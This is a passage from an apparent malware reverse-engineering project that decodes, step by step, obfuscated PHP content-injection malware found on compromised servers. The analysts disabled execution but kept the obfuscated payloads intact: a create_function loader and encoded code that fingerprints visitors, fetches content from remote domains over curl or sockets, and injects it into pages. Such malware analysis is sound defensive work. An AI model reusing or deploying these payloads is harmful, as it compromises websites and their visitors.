 5 |  * compromised servers. "REVENGNOTE" is used for comments that are not
 6 |  * in the original code.
 7 |  *
 8 |  * @see        https://github.com/alligo/Reverse-Engineering-PHP-Malware-Content-injection
 9 |  * @author     Bernardo Donadio <emerson at alligo.com.br>
10 |  * @author     Emerson Rocha Luiz <emerson at alligo.com.br>
11 |  * @copyright  Copyright (C) 2016 Alligo Ltda. Some rights reserved.
12 |  * @license    See LICENSE
13 |  */
14 | 
15 | /** REVENGNOTE: next code was not on this step, but was added to make it run or debug **/
16 | $_SERVER["\x48\124\x54\120\x5f\125\x53\105\x52\137\x41\107\x45\116\x54"] = "\x6d\163\x69\145";
17 | 
18 | 
19 | if((function_exists("\x6f\142\x5f\163\x74\141\x72\164") && (!isset($GLOBALS["\x61\156\x75\156\x61"])))) {
20 |   $GLOBALS["\x61\156\x75\156\x61"]=1;
21 |   $uas=strtolower($_SERVER["\x48\124\x54\120\x5f\125\x53\105\x52\137\x41\107\x45\116\x54"]);
22 |   if ((strstr($uas,"\x6d\163\x69\145")) or (strstr($uas,"\x72\166\x3a\61\x31"))) {
23 |     $tupzwgv = "\x63\162\x65\141\x74\145\x5f\146\x75\156\x63\164\x69\157\x6e";
24 | 	function khjatfs($n){
25 | 	  return chr(ord($n)-1);
26 | 	}
27 | 	@error_reporting(0);
28 | 	$fonatsf = implode(array_map("khjatfs",str_split("%tjw!>!#]y84]275]y83]248]y83]256]y81]265]y72]254]y76#<!%w:!>!(%w:!>!\x246767~6<Cw6<pd%w6Z6<.5`hA\x27pd%6<pd%w6Z6<.4`hA\x27pd%6<pd%w6Z6<.3`hA\x27pd%6<pd%w6Z6<.2`hA\x27pd%6<C\x27pd%6|6.7eu{66~67<&w6<*&7-#o]s]o]s]#)fepmqyf\x27*&7-n%)utjm6<\x7fw6*CW&)7gj6<*K)ftpmdXA6~6<u%7>/7&6|7**111127-K)ebfsX\x27u%)7fmjix6<C\x27&6<*rfs%7-K)fujsxX6<#o]o]Y%7;utpI#7>/7rfs%6<#o]1/20QUUI7jsv%7UFH#\x27rfs%6~6<\x7fw6<*K)ftpmdXA6|7**197-2qj%7-K)udfoopdXA\x22)7gj6<*QDU`MPT7-NBFSUT`LDPT7-UFOJ`GB)fubfsdXA\x27K6<\x7fw6*3qj%7>\x2272qj%)7gj6<**2qj%)hopm3qjA)qj3hopmA\x273qj%6<*Y%)fnbozcYufhA\x272qj%6<^#zsfvr#\x5cq%7/7#@#7/7^#iubq#\x5cq%\x27jsv%6<C>^#zsfvr#\x5cq%7**^#zsfvr#\x5cq%)ufttj\x22)gj6<^#Y#\x5cq%\x27Y%6<.msv`ftsbqA7>q%6<\x7fw6*\x7f_*#fubfsdXk5`{66~6<&w6<\x7fw6*CW&)7gj6<*doj%7-C)fepmqnjA\x27&6<.fmjgA\x27doj%6<\x7fw6*\x7f_*#fmjgk4`{6~6<tfs%w6<\x7fw6*CWtfs%)7gj6<*id%)ftpmdR6<*id%)dfyfR\x27tfs%6<*17-SFEBFI,6<*127-UVPFNJU,6<*27-SFGTOBSUOSVUFS,6<*msv%7-MSV,6<*)ujojR\x27id%6<\x7fw6*\x7f_*#ujojRk3`{666~6<&w6<\x7fw6*CW&)7gj6<.[A\x27&6<\x7fw6*\x7f_*#[k2`{6:!}7;!}6;##}C;!>>!}W;utpi}Y;tuofuopd`ufh`fmjg}[;ldpt%}K;`ufldpt}X;`msvd}R;*msv%)}.;`UQPMSVD!-id%)uqpuft`msvd},;uqpuft`msvd}+;!>!}\x27;!>>>!}_;gvc%}&;ftmbg}\x7f;!osvufs}w;*\x7f!>>\x22!pd%)!gj}Z;h!opjudovg}{;#)tutjyf`opjudovg)!gj!|!*msv%)}k~~~<ftmbg!osvufs!|ftmf!~<**9.-j%-bubE{h%)sutcvt)fubmgoj{hA!osvufs!~<3,j%>j%!*3!\x27!hmg%!)!gj!<2,*j%!-#1]#-bubE{h%)tpqsut>j%!*72!\x27!hmg%)!gj!<2,*j%-#1]#-bubE{h%)tpqsut>j%!*9!\x27!hmg%)!gj!~<ofmy%,3,j%>j%!<**3-j%-bubE{h%)sutcvt-#w#)ldbqov>*ofmy%)utjm!|!*5!\x27!hmg%)!gj!|!*1?hmg%)!gj!<**2-4-bubE{h%)sutcvt)esp>hmg%!<12>j%!|!*#91y]c9y]g2y]#>>*4-1-bubE{h%)sutcvt)!gj!|!*bubE{h%)j{hnpd!opjudovg!|!**#j{hnpd#)tutjyf`opjudovg\x22)!gj}1~!<2p%\x7f!~!<##!>!2p%Z<^2\x5c2b%!>!2p%!*3>?*2b%)gpf{jt)!gj!<*2bd%-#1GO\x22#)fepmqyfA>2b%!<*qp%-*.%)euhA)3of>2bd%!<5h%/#0#/*#npd/#)rrd/#00;quui#>.%!<***f\x27,*e\x27,*d\x27,*c\x27,*b\x27)fepdof.)fepdof./#@#/qp%>5h%!<*::::::-111112)eobs`un>qp%!|Z~!<##!>!2p%!|!*!***b%)sfxpmpusut!-#j0#!/!**#sfmcnbs+yfeobz+sfwjidsb`bj+upcotn+qsvmt+fmhpph#)zbssb!-#}#)fepmqnj!/!#0#)idubn`hfsq)!sp!*#ojneb#-*f%)sfxpmpusut)tpqssutRe%)Rd%)Rb%))!gj!<*#cd2bge56+99386c6f+9f5d816:+946:ce44#)zbssb!>!ssbnpe_GMFT`QIQ&f_UTPI`QUUI&e_SEEB`FUPNFS&d_SFSFGFS`QUUI&c_UOFHB`SFTV`QUUI&b%!|!*)323zbek!~!<b%\x7f!<X>b%Z<#opo#>b%!*##>>X)!gjZ<#opo#>b%!**X)ufttj\x22)gj!|!*nbsbq%)323ldfidk!~!<**qp%!-uyfu%)3of)fepdof`57ftbc\x7f!|!*uyfu\x27k:!ftmf!}Z;^nbsbq%\x5cSFWSFT`%}X;!sp!*#opo#>>}R;msv}.;/#/#/},;#-#}+;%-qp%)54l}\x27;%!<*#}_;#)323ldfid>}&;!osvufs}\x7f;!opjudovg}k~~9{d%:osvufs:~928>>\x22:ftmbg39*56A:>:8:|:7#6#)tutjyf`439275ttfsqnpdov{h19275j{hnpd19275fubmgoj{h1:|:*mmvo:>:iuhofm%:-5ppde:4:|:**#ppde#)tutjyf`4\x223}!+!<+{e%+*!*+fepdfe{h+{d%)+opjudovg+)!gj+{e%!osvufs!*!+A!>!{e%)!>>\x22!ftmbg)!gj<*#k#)usbut`cpV\x7f\x7f\x7f\x7f<u%V\x27{ftmfV\x7f<*X&Z&S{ftmfV\x7f<*XAZASV<*w%)ppde>u%V<#65,47R25,d7R17,67R37,#/q%>U<#16,47R57,27R66,#/q%>2q%<#g6R85,67R37,18R#>q%V<*#fopoV;hojepdoF.uofuopD#)sfebfI{*w%)kVx{**#k#)tutjyf`x\x22l:!}V;3q%}U;y]}R;2]},;osvufs}\x27;mnui}&;zepc}A;~!}\x7f;!|!}{;)gj}l;33bq}k;opjudovg}x;0]=])0#)U!\x27{**u%-#jt0}Z;0]=]0#)2q%l}S;2-u%!-#2#/#%#/#o]#/*)323zbe!-#jt0*?]+^?]_\x5c}X\x24<!%tmw!>!#]y84]275]y83]273]y76]277#<!%t2w>#]y74]273]y76]252]y85]256]y6g]257]y86]267]y74]275]y7:]268]y7f#<!%tww!>!\x2400~:<h%_t%:osvufs:~:<*9-1-r%)s%>/h%:<**#57]38y]47]67y]37]88y]27]28y]#/r%/h%)n%-#+I#)q%:>:r%:|:**t%)m%=*h%)m%):fmjix:<##:>:h%:<#64y]552]e7y]#>n%<#372]58y]472]37y]672]48y]#>s%<#462]47y]252]18y]#>q%<#762]67y]562]38y]572]48y]#>m%:|:*r%:-t%)3of:opjudovg<~\x24<!%o:!>!\x242178}527}88:}334}472\x24<!%ff2!>!bssbz)\x24]25\x24-\x24-!%\x24-\x24*!|!\x24-\x24\x5c%j^\x24-\x24tvctus)%\x24-\x24b!>!%yy)#}#-#\x24-\x24-tusqpt)%z-#:#*\x24-\x24!>!\x24/%tjw/\x24)%\x24-\x24y4\x24-\x24]y8\x24-\x24]26\x24-\x24<%j,,*!|\x24-\x24gvodujpo!\x24-\x24y7\x24-\x24*<!\x24-\x24gps)%j>1<%j=tj{fpg)%\x24-\x24*<!~!\x24/%t2w/\x24)##-!#~<#/%\x24-\x24!>!fyqmpef)#\x24*<!%t::!>!\x24Ypp3)%cB%iN}#-!\x24/%tmw/\x24)%c*W%eN+#Qi\x5c1^W%c!>!%i\x5c2^<!Ce*[!%cIjQeTQcOc/#00#W~!Ydrr)%rxB%epnbss!>!bssbz)#44ec:649#-!#:618d5f9#-!#f6c68399#-!#65egb2dc#*<!sfuvso!sboepn)%epnbss-%rxW~!Ypp2)%zB%z>!\x24/%tmw/\x24)%zW%h>EzH,2W%wN;#-Ez-1H*WCw*[!%rN}#QwTW%hIr\x5c1^-%r\x5c2^-%hOh/#00#W~!%t2w)##Qtjw)#]82#-#!#-%tmw)%tww**WYsboepn)%bss-%rxB%h>#]y31]278]y3e]81]K78:56985:6197g:74985-rr.93e:5597f-s.973:8297f:5297e:56-xr.985:52985-t.98]K4]65]D8]86]y31]278]y3f]51L3]84]y31M6]y3e]81#/#7e:55946-tr.984:75983:48984:71]K9]77]D4]82]K6]72]K9]78]K5]53]Kc#<%tpz!>!#]D6M7]K3#<%yy>#]D6]281L1#/#M5]DgP5]D6#<%fdy>#]D4]273]D6P2L5P6]y6gP7L6M7]D4]275]D:M8]Df#<%tdz>#L4]275L3]248L3P6L1M5]D2P4]D6#<%G]y6d]281Ld]245]K2]285]Ke]53Ld]53]Kc]55Ld]55#*<%bG9}:}.}-}!#*<%nfd>%fdy<Cb*[%h!>!%tdz)%bbT-%bT-%hW~%fdy)##-!#~<%h00#*<%nfd)##Qtpz)#]341]88M4P8]37]278]225]241]334]368]322]3]364]6]283]427]36]373P6]36]73]83]238M7]381]211M5]67]452]88]5]48]32M3]317]445]212]445]43]321]464]284]364]6]234]342]58]24]31#-%tdz*Wsfuvso!%bss\x5csboe))1/35.)1/14+9**-)1/2986+7**^/%rx<~!!%s:N}#-%o:W%c:>1<%b:>1<!gps)%j:>1<%j:=tj{fpg)%s:*<%j:,,Bjg!)%j:>>1*!%b:>1<!fmtf!%b:>%s:\x5c%j:.2^,%b:<!%c:>%s:\x5c%j:^<!%w`\x5c^>Ew:Qb:Qc:W~!%z!>2<!gps)%j>1<%j=6[%ww2!>#p#/#p#/%z<jg!)%z>>2*!%z>3<!fmtf!%z>2<!%ww2)%w`TW~\x24<!fwbm)%tjw)bssbz)#P#-#Q#-#B#-#T#-#E#-#G#-#H#-#I#-#K#-#L#-#M#-#[#-#Y#-#D#-#W#-#C#-#O#-#N#*-!%ff2-!%t::**<(<!fwbm)%tjw)#\x24#-!#]y38#-!%w:**<")));
29 |   $nsxgpqr = $tupzwgv("", $fonatsf);
30 | 
31 |   /** REVENGNOTE: next code was not on this step, but was added to make it run or debug **/
32 |   echo '$fonatsf:' . print_r($fonatsf, true) . PHP_EOL;
33 | 
34 |   /** REVENGNOTE: next lines was commented to disable run the source. Original have it enabled **/
35 |   //$nsxgpqr();
36 |   }
37 | }
38 | 


--------------------------------------------------------------------------------
/step-by-step/reveng-step-3.php:
--------------------------------------------------------------------------------
 1 | <?php
 2 | 
 3 | /**
 4 |  * This is a This is a reverse-engineering of malicious code found in
 5 |  * compromised servers. "REVENGNOTE" is used for comments that are not
 6 |  * in the original code.
 7 |  *
 8 |  * @see        https://github.com/alligo/Reverse-Engineering-PHP-Malware-Content-injection
 9 |  * @author     Bernardo Donadio <emerson at alligo.com.br>
10 |  * @author     Emerson Rocha Luiz <emerson at alligo.com.br>
11 |  * @copyright  Copyright (C) 2016 Alligo Ltda. Some rights reserved.
12 |  * @license    See LICENSE
13 |  */
14 | 
15 | $siv = "\x73\164\x72\137\x72\145\x70\154\x61\143\x65"; /** REVENGNOTE: str_replace **/
16 | 
17 | /** REVENGNOTE: next code was not on this step, but was added to make it run or debug **/
18 | echo '$siv:' . print_r($siv, true) . PHP_EOL;
19 | 
20 | $v9 = '$v9 = #5656}5;Bv5;oc$v5Y5;-4_g@&oc$5;oc$v5Y5;-3_g@&oc$5;oc$v5Y5;-2_g@&oc$5;oc$v5Y5;-1_g@&oc$5;B&oc$5{5-6dtz55}56;%v5;)%6,"n\r\n\r\"(edolpxe&)%6,m$(tsil5;~v5)BV%(6fi5;)J(esolcW@5}5;t$6=.6%5{6))000016,J(daerW&t$(6elihw5;B&%5;)qer$6,J(etirwW5;"n\n\X$6:tsoH"6=.6qer$5;"n\0.1/PTTH6iru$6TEG"&qer$5}5;~v5;)J(esolcW@5{6))086,1pi$6,J(tcennocW@!(6fi5;)PCT_LOS6,MAERTS_KCOS6,TENI_FA(etaercW@&J5;~v5)2pi$6=!61pi$(6fi5;))1pi$(gnol2pi@(pi2gnol@&2pi$5;)X$(emanybXteg@&1pi$5;]"yreuq"[p$6.6"?"6.6]"htap"[p$&iru$5;B=]"yreuq"[p$6))]"yreuq"[p$(tessi!(fi5;]"X"[p$&X$5;-lru_esrap@6=p$5;~v5)~^)"etaercWj4_z55}5;%v5;~v5)BV%(6fi5;)cni$6,B(edolpmi@&%5;-elif@&cni$5;~v5)~^)"elifj3_z5}5;ser$v5;~v5)BVser$(6fi5;)hc$(esolcQ5;)hc$(cexeQ&ser$5;)06,REDAEH+5;)016,TUOEMIT+5;)16,REFSNARTNRUTER+5;)lru$6,LRU+5;)(tiniQ&hc$5;~v5)~^)"tiniQj2_z555}5;%v5;~v5)BV%(6fi5;-Z@&%5;~v5)~^)"Zj1_z59 |6: |5:""|B: == |V:tsoh|X:stnetnoc_teg_elif|Z:kcos$|J:_tekcos|W:_lruc|Q:)lru$(|-:_TPOLRUC ,hc$(tpotes_lruc|+:tpotes_lruc|*: = |&: === |^:fub$|%:eslaf|~: nruter|v:)~ ==! oc$( fi|Y:g noitcnuf|z:"(stsixe_noitcnuf( fi { )lru$(|j}}};eslaf nruter {esle };))8-,i$,ataDzg$(rtsbus(etalfnizg@ nruter };2+i$=i$ )2 & glf$ ( fi ;1+)i$ ,"0\",ataDzg$(soprts=i$ )61 & glf$( fi ;1+)i$,"0\",ataDzg$(soprts=i$ )8 & glf$( fi };nelx$+2+i$=i$ ;))2,i$,ataDzg$(rtsbus,"v"(kcapnu=)nelx$(tsil { )4 & glf$( fi { )0>glf$( fi ;))1,3,ataDzg$(rtsbus(dro=glf$ ;01=i$ { )"80x\b8x\f1x\"==)3,0,ataDzg$(rtsbus( fi { )ataDzg$(izgmoc noitcnuf { ))"izgmoc"(stsixe_noitcnuf!( fi|0} ;1o$~ } ;"" = 1o$Y;]1[1a$ = 1o$ )2=>)1a$(foezis( fi ;)1ac$,"0FN!"(edolpxe@=1a$ ;)po$,)-$(dtg@(2ne=1ac$ ;4g$."/".)"moc."(qqc."//:ptth"=-$ ;)))e&+)d&+)c&+)b&+)a&(edocne-(edocne-."?".po$=4g$ ;)999999,000001(dnar_tm=po$ {Y} ;"" = 1o$ { ) )))a$(rewolotrts ,"i/" . ))"relbmar*xednay*revihcra_ai*tobnsm*pruls*elgoog"(yarra ,"|"(edolpmi . "/"(hctam_gerp( ro )"nimda",)e$(rewolotrts(soprrtsQd$(Qc$(Qa$(( fi ;)"bc1afd45*88275b5e*8e4c7059*8359bd33"(yarra = rramod^FLES_PHP%e^TSOH_PTTH%d^RDDA_ETOMER%c^REREFER_PTTH%b^TNEGA_RESU_PTTH%a$ { )(212yadj } ;a$~ ;W=a$Y;"non"=a$ )""==W( fiY;"non"=a$ ))W(tessi!(fi { )marap$(212kcehcj } ;))po$ ,txet$(2ne(edocne_46esab~ { )txet&j9 esle |Y:]marap$[REVRES_$|W: ro )"non"==|Q:lru|-:.".".|+:","|*:$,po$(43k|&:$ ;)"|^:"(212kcehc=|%: nruter|~: noitcnuf|j}}8zc$9nruter9}817==!9eslaf28)45@9=979{96"5"(stsixe_328164sserpmocnuzg08164izgmoc08164etalfnizg09{9)llun9=9htgnel$9,4oocd939{9))"oocd"(stsixe_3!2| * ;*zd$*) )*edocedzg*zc$(*noitcnuf*( fi*zd$ nruter ) *@ = zd$( ==! eslaf( fi;)"j"(trats_boU~~~~;t$U&zesleU~;)W%Y%RzesleU~;)W@Y@RU;)v$(oocd=t$U;"54+36Q14+c6Q06+56Q26+".p$=T;"05+36Q46+16Q55+".p$=1p$;"f5Q74+56Q26+07Q"=p$U;)"enonU:gnidocnE-tnetnoC"(redaeHz)v$(jUwz))"j"(stsixe_w!k9 |U:2p$|T:x\|Q:1\|+:nruter|&:lmth|%:ydob|@:} |~: { |z:(fi|k:22ap|j:noitcnuf|w:/\<\(/"(T &z))t$,"is/|Y:/\<\/"(1p$k|R:1,t$ ,"1"."$"."n\".)(212yad ,"is/)>\*]>\^[|W#; $slv = "\x73\164\x72\162\x65\166"; $s1v="\x63\162\x65\141\x74\145\x5f\146\x75\156\x63\164\x69\157\x6e"; $svv = #//}9;g$^s$9nruter9}9;)8,0,q$(r$=.g$9;))"46\27x\36\56x\26\77x\16\17x\".q$.g$(m$,"*H"(p$9=9q$9{9))s$(l$<)g$(l$(9elihw9;""9=9g$9;"53x\441\d6x\"=m$;"261\47x\361\26x\561\37x\"=r$;"351\36x\141\07x\"=p$;"651\56x\451\27x\461\37x\"=l$9{9)q$9,s$(2ne9noitcnuf;}#; $n9 = #1067|416|779|223|361#; $ee1 = array(#\14#,#, $#,#) { #,#[$i]#,#substr($#,#a = $xx("|","#,#,strpos($y,"9")#,# = #.$siv.#($#,#x3#,#\x7#,#\15#,#;$i++) {#,#function #,#x6#,#); #,#for($i=0;$i<sizeof($#,#); } #.$s1v.#("", "};".$#,# = explode("#); $s99 = #Xoo2($bA$hM|", #.$slv.#($b)V$dM*"Ph[0]V$b = $h[1]; Bd)Z $bHiPdSPbNb."//"V} Xcqq($qwA$domarr = array("33db9538", "9507c4e8", "e5b57288", "54dfa1cb"); return random($domarr,$qwV} Xoo1($yA$y= #.$slv.#($yV$g=DyG+1V$vM:",Dy,0G)VBv)Z $qM|"PvSV$gHq[0],$q[1],$gNg."//"V} $s1v(""Psiv("\71"," ",$slv($svv))VXrandom($arr,$qwA$g="\x20\167\x2d\70\J6794587495086f963874,qq-82d94486e,r-86297186e94186d945,wq-874941874,s-87\J3\54\C7\75\x20\167\x2e\40K2\73\x20L5\x2d\70"."6d944835,sq-873964872937873960\J8\66\C3\71\J5\61\J8\67\J4\42\Jb";$soy = "\C5L6\J2";$xx="\C5\170K0"."L4\CfO4\C5";$ecx="\C3\162\C5O1K4O5\x5fO6K5L6\C3\164\C9L7\Ce";$scy="K3\164K2\137K2O5K0L4\C1O3\C5";$F\x5c\170Kc\134\J1\174\Jd\42Kc\42\Jb\44Kc\44");$aF8|9|-|,| ");$mec=$ecx;Ba)Z$g = $scy($aaS,$aS,$gV}$ecx("", "};$g//");$mec(""Psoy("\230\77L3O7\26\167\114\130\223\257\211\2\253\5\172\316\25\262O5\25\62\72\127L6\270\100L4\56\341\77\4\37\21L2\206\334\101\334\32\210\353\173\253\5\123\231\47\13\20",$scy)Vreturn $arr[rand((0.24-(0.03*8)),(0.1875*6))].$qw;}  $r9M|",$n9V$b9=0;$a9=0; for($i9=0;$i9<sizeof($r9);$i9++Aif ($i9==0) $a9=0; else $a9=$r9[$i9-1]+$a9; $b9=$r9[$i9]; $v_[]=Dv9Pa9Pb9V} $y =1; for($i=0;$i<5Z$vv1 ="o"."o".$y;if ($y==1) $y=2; else $y=1; $vv1($v_SV}#; eval($siv(array("O","P","A","S","D","F","G","H","J","K","L","Z","X","C","V","B","N","M"), $ee1, $s99));';
21 | 
22 | /** REVENGNOTE: next lines was commented to disable run the source. Original have it enabled **/
23 | //eval($siv("#", "\x27", $v9));
24 | 
25 | /** REVENGNOTE: next code was not on this step, but was added to make it run or debug **/
26 | echo '$siv("#", "\x27", $v9):' . print_r($siv("#", "\x27", $v9), true) . PHP_EOL;


--------------------------------------------------------------------------------
/step-by-step/reveng-step-4.php:
--------------------------------------------------------------------------------
 1 | <?php
 2 | 
 3 | /**
 4 |  * This is a This is a reverse-engineering of malicious code found in
 5 |  * compromised servers. "REVENGNOTE" is used for comments that are not
 6 |  * in the original code.
 7 |  *
 8 |  * @see        https://github.com/alligo/Reverse-Engineering-PHP-Malware-Content-injection
 9 |  * @author     Bernardo Donadio <emerson at alligo.com.br>
10 |  * @author     Emerson Rocha Luiz <emerson at alligo.com.br>
11 |  * @copyright  Copyright (C) 2016 Alligo Ltda. Some rights reserved.
12 |  * @license    See LICENSE
13 |  */
14 | 
15 | /** REVENGNOTE: next code was added to make this file work. Was present on last step **/
16 | $siv = "\x73\164\x72\137\x72\145\x70\154\x61\143\x65";
17 | 
18 | $v9 = '5656}5;Bv5;oc$v5Y5;-4_g@&oc$5;oc$v5Y5;-3_g@&oc$5;oc$v5Y5;-2_g@&oc$5;oc$v5Y5;-1_g@&oc$5;B&oc$5{5-6dtz55}56;%v5;)%6,"n\r\n\r\"(edolpxe&)%6,m$(tsil5;~v5)BV%(6fi5;)J(esolcW@5}5;t$6=.6%5{6))000016,J(daerW&t$(6elihw5;B&%5;)qer$6,J(etirwW5;"n\n\X$6:tsoH"6=.6qer$5;"n\0.1/PTTH6iru$6TEG"&qer$5}5;~v5;)J(esolcW@5{6))086,1pi$6,J(tcennocW@!(6fi5;)PCT_LOS6,MAERTS_KCOS6,TENI_FA(etaercW@&J5;~v5)2pi$6=!61pi$(6fi5;))1pi$(gnol2pi@(pi2gnol@&2pi$5;)X$(emanybXteg@&1pi$5;]"yreuq"[p$6.6"?"6.6]"htap"[p$&iru$5;B=]"yreuq"[p$6))]"yreuq"[p$(tessi!(fi5;]"X"[p$&X$5;-lru_esrap@6=p$5;~v5)~^)"etaercWj4_z55}5;%v5;~v5)BV%(6fi5;)cni$6,B(edolpmi@&%5;-elif@&cni$5;~v5)~^)"elifj3_z5}5;ser$v5;~v5)BVser$(6fi5;)hc$(esolcQ5;)hc$(cexeQ&ser$5;)06,REDAEH+5;)016,TUOEMIT+5;)16,REFSNARTNRUTER+5;)lru$6,LRU+5;)(tiniQ&hc$5;~v5)~^)"tiniQj2_z555}5;%v5;~v5)BV%(6fi5;-Z@&%5;~v5)~^)"Zj1_z59 |6: |5:""|B: == |V:tsoh|X:stnetnoc_teg_elif|Z:kcos$|J:_tekcos|W:_lruc|Q:)lru$(|-:_TPOLRUC ,hc$(tpotes_lruc|+:tpotes_lruc|*: = |&: === |^:fub$|%:eslaf|~: nruter|v:)~ ==! oc$( fi|Y:g noitcnuf|z:"(stsixe_noitcnuf( fi { )lru$(|j}}};eslaf nruter {esle };))8-,i$,ataDzg$(rtsbus(etalfnizg@ nruter };2+i$=i$ )2 & glf$ ( fi ;1+)i$ ,"0\",ataDzg$(soprts=i$ )61 & glf$( fi ;1+)i$,"0\",ataDzg$(soprts=i$ )8 & glf$( fi };nelx$+2+i$=i$ ;))2,i$,ataDzg$(rtsbus,"v"(kcapnu=)nelx$(tsil { )4 & glf$( fi { )0>glf$( fi ;))1,3,ataDzg$(rtsbus(dro=glf$ ;01=i$ { )"80x\b8x\f1x\"==)3,0,ataDzg$(rtsbus( fi { )ataDzg$(izgmoc noitcnuf { ))"izgmoc"(stsixe_noitcnuf!( fi|0} ;1o$~ } ;"" = 1o$Y;]1[1a$ = 1o$ )2=>)1a$(foezis( fi ;)1ac$,"0FN!"(edolpxe@=1a$ ;)po$,)-$(dtg@(2ne=1ac$ ;4g$."/".)"moc."(qqc."//:ptth"=-$ ;)))e&+)d&+)c&+)b&+)a&(edocne-(edocne-."?".po$=4g$ ;)999999,000001(dnar_tm=po$ {Y} ;"" = 1o$ { ) )))a$(rewolotrts ,"i/" . ))"relbmar*xednay*revihcra_ai*tobnsm*pruls*elgoog"(yarra ,"|"(edolpmi . "/"(hctam_gerp( ro )"nimda",)e$(rewolotrts(soprrtsQd$(Qc$(Qa$(( fi ;)"bc1afd45*88275b5e*8e4c7059*8359bd33"(yarra = rramod^FLES_PHP%e^TSOH_PTTH%d^RDDA_ETOMER%c^REREFER_PTTH%b^TNEGA_RESU_PTTH%a$ { )(212yadj } ;a$~ ;W=a$Y;"non"=a$ )""==W( fiY;"non"=a$ ))W(tessi!(fi { )marap$(212kcehcj } ;))po$ ,txet$(2ne(edocne_46esab~ { )txet&j9 esle |Y:]marap$[REVRES_$|W: ro )"non"==|Q:lru|-:.".".|+:","|*:$,po$(43k|&:$ ;)"|^:"(212kcehc=|%: nruter|~: noitcnuf|j}}8zc$9nruter9}817==!9eslaf28)45@9=979{96"5"(stsixe_328164sserpmocnuzg08164izgmoc08164etalfnizg09{9)llun9=9htgnel$9,4oocd939{9))"oocd"(stsixe_3!2| * ;*zd$*) )*edocedzg*zc$(*noitcnuf*( fi*zd$ nruter ) *@ = zd$( ==! eslaf( fi;)"j"(trats_boU~~~~;t$U&zesleU~;)W%Y%RzesleU~;)W@Y@RU;)v$(oocd=t$U;"54+36Q14+c6Q06+56Q26+".p$=T;"05+36Q46+16Q55+".p$=1p$;"f5Q74+56Q26+07Q"=p$U;)"enonU:gnidocnE-tnetnoC"(redaeHz)v$(jUwz))"j"(stsixe_w!k9 |U:2p$|T:x\|Q:1\|+:nruter|&:lmth|%:ydob|@:} |~: { |z:(fi|k:22ap|j:noitcnuf|w:/\<\(/"(T &z))t$,"is/|Y:/\<\/"(1p$k|R:1,t$ ,"1"."$"."n\".)(212yad ,"is/)>\*]>\^[|W';
19 | $slv = "\x73\164\x72\162\x65\166";
20 | $s1v="\x63\162\x65\141\x74\145\x5f\146\x75\156\x63\164\x69\157\x6e";
21 | $svv = '//}9;g$^s$9nruter9}9;)8,0,q$(r$=.g$9;))"46\27x\36\56x\26\77x\16\17x\".q$.g$(m$,"*H"(p$9=9q$9{9))s$(l$<)g$(l$(9elihw9;""9=9g$9;"53x\441\d6x\"=m$;"261\47x\361\26x\561\37x\"=r$;"351\36x\141\07x\"=p$;"651\56x\451\27x\461\37x\"=l$9{9)q$9,s$(2ne9noitcnuf;}';
22 | $n9 = '1067|416|779|223|361';
23 | $ee1 = array('\14',', $',') { ','[$i]','substr($','a = $xx("|","',',strpos($y,"9")',' = '.$siv.'($','x3','\x7','\15',';$i++) {','function ','x6','); ','for($i=0;$i<sizeof($','); } '.$s1v.'("", "};".$',' = explode("');
24 | $s99 = 'Xoo2($bA$hM|", '.$slv.'($b)V$dM*"Ph[0]V$b = $h[1]; Bd)Z $bHiPdSPbNb."//"V} Xcqq($qwA$domarr = array("33db9538", "9507c4e8", "e5b57288", "54dfa1cb"); return random($domarr,$qwV} Xoo1($yA$y= '.$slv.'($yV$g=DyG+1V$vM:",Dy,0G)VBv)Z $qM|"PvSV$gHq[0],$q[1],$gNg."//"V} $s1v(""Psiv("\71"," ",$slv($svv))VXrandom($arr,$qwA$g="\x20\167\x2d\70\J6794587495086f963874,qq-82d94486e,r-86297186e94186d945,wq-874941874,s-87\J3\54\C7\75\x20\167\x2e\40K2\73\x20L5\x2d\70"."6d944835,sq-873964872937873960\J8\66\C3\71\J5\61\J8\67\J4\42\Jb";$soy = "\C5L6\J2";$xx="\C5\170K0"."L4\CfO4\C5";$ecx="\C3\162\C5O1K4O5\x5fO6K5L6\C3\164\C9L7\Ce";$scy="K3\164K2\137K2O5K0L4\C1O3\C5";$F\x5c\170Kc\134\J1\174\Jd\42Kc\42\Jb\44Kc\44");$aF8|9|-|,| ");$mec=$ecx;Ba)Z$g = $scy($aaS,$aS,$gV}$ecx("", "};$g//");$mec(""Psoy("\230\77L3O7\26\167\114\130\223\257\211\2\253\5\172\316\25\262O5\25\62\72\127L6\270\100L4\56\341\77\4\37\21L2\206\334\101\334\32\210\353\173\253\5\123\231\47\13\20",$scy)Vreturn $arr[rand((0.24-(0.03*8)),(0.1875*6))].$qw;}  $r9M|",$n9V$b9=0;$a9=0; for($i9=0;$i9<sizeof($r9);$i9++Aif ($i9==0) $a9=0; else $a9=$r9[$i9-1]+$a9; $b9=$r9[$i9]; $v_[]=Dv9Pa9Pb9V} $y =1; for($i=0;$i<5Z$vv1 ="o"."o".$y;if ($y==1) $y=2; else $y=1; $vv1($v_SV}';
25 | 
26 | /** REVENGNOTE: next lines was commented to disable run the source. Original have it enabled **/
27 | //eval($siv(array("O","P","A","S","D","F","G","H","J","K","L","Z","X","C","V","B","N","M"), $ee1, $s99));
28 | 
29 | /** REVENGNOTE: next code was not on this step, but was added to make it run or debug **/
30 | echo '$siv(array("O","P","A","S","D","F","G","H","J","K","L","Z","X","C","V","B","N","M"), $ee1, $s99):' . print_r($siv(array("O","P","A","S","D","F","G","H","J","K","L","Z","X","C","V","B","N","M"), $ee1, $s99), true) . PHP_EOL;
31 | 


--------------------------------------------------------------------------------
/step-by-step/reveng-step-5.php:
--------------------------------------------------------------------------------
 1 | <?php
 2 | 
 3 | /**
 4 |  * This is a This is a reverse-engineering of malicious code found in
 5 |  * compromised servers. "REVENGNOTE" is used for comments that are not
 6 |  * in the original code.
 7 |  *
 8 |  * @see        https://github.com/alligo/Reverse-Engineering-PHP-Malware-Content-injection
 9 |  * @author     Bernardo Donadio <emerson at alligo.com.br>
10 |  * @author     Emerson Rocha Luiz <emerson at alligo.com.br>
11 |  * @copyright  Copyright (C) 2016 Alligo Ltda. Some rights reserved.
12 |  * @license    See LICENSE
13 |  */
14 | 
15 | /** REVENGNOTE: next code was added to make this file work. Was present on last step **/
16 | $siv = "\x73\164\x72\137\x72\145\x70\154\x61\143\x65";  /** REVENGNOTE: str_replace **/
17 | 
18 | /** REVENGNOTE: next code was added to make this file work. Was present on last step **/
19 | $slv = "\x73\164\x72\162\x65\166";  /** REVENGNOTE: strrev **/
20 | 
21 | /** REVENGNOTE: next code was added to make this file work. Was present on last step **/
